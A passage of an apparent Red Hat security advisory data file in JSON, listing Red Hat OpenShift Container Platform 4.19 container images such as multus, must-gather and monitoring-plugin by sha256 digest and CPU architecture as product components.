"product_reference": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:c3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:c3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:c3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:d6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:d6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:d6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
